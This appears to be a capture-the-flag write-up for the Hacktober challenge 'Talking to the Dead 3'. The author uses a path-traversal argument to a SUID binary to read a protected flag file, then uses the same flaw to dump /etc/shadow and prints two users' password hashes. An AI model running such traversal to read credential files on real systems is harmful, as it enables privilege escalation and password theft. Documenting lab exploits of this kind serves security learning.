Talking to the Dead 3

Challenge:

Submit the contents of flag3.txt from the remote machine.

ssh hacktober@env.hacktober.io

Password: hacktober-Underdog-Truth-Glimpse

Solution:

My first step was to find a file named flag3.txt:

$ find / -xdev -name "flag3.txt" 2>/dev/null

/home/spookyboi/Documents/flag3.txt

$ ls -l /home/spookyboi/Documents/flag3.txt
-rw-rw---- 1 spookyboi spookyboi 47 Oct  6 08:39 /home/spookyboi/Documents/flag3.txt

The flag is located under spookyboi’s home directory and is not readable by my current account. At this point I spent a lot of time looking for a way to gain permissions to the spookyboi account and eventually moved on to solve the Talking to the Dead 4 challenge. After completing that challenge I used the same technique to solve this challenge as well.

I supplied an argument to the SUID binary that would travers out of root’s directory and to the flag file:

$ /usr/local/bin/ouija ../home/spookyboi/Documents/flag3.txt

flag{445b987b5b80e445c3147314dbfa71acd79c2b67}

After the CTF ended the challenge author shared on Slack that this was not the intended solution. The ouija binary was supposed to prevent the reading of files outside of the /root directory.

$ /usr/local/bin/ouija ../etc/shadow                        
...
luciafer:$6$NVAoBcjBYyrnL5AV$8YmzXraiOg.ckwx9ByW96r6lJb7YYrukwChHo.Ipx1kxzbKqAH3I6IYXShKsIvAiYm96hXGf1awv4s1WiAXf0.:18540:0:99999:7:::
spookyboi:$6$ECSp0SsQEjlfU..X$d0bi6hebQ6k3Ntac1khDM4iGCnxwt39jmeYoIvAtLsWV12nm4.pmxdmLrxBgUlaVhpTRlFTgIEf1w11f4ELvy.:18540:0:99999:7:::

Published:

Updated:

Leave a comment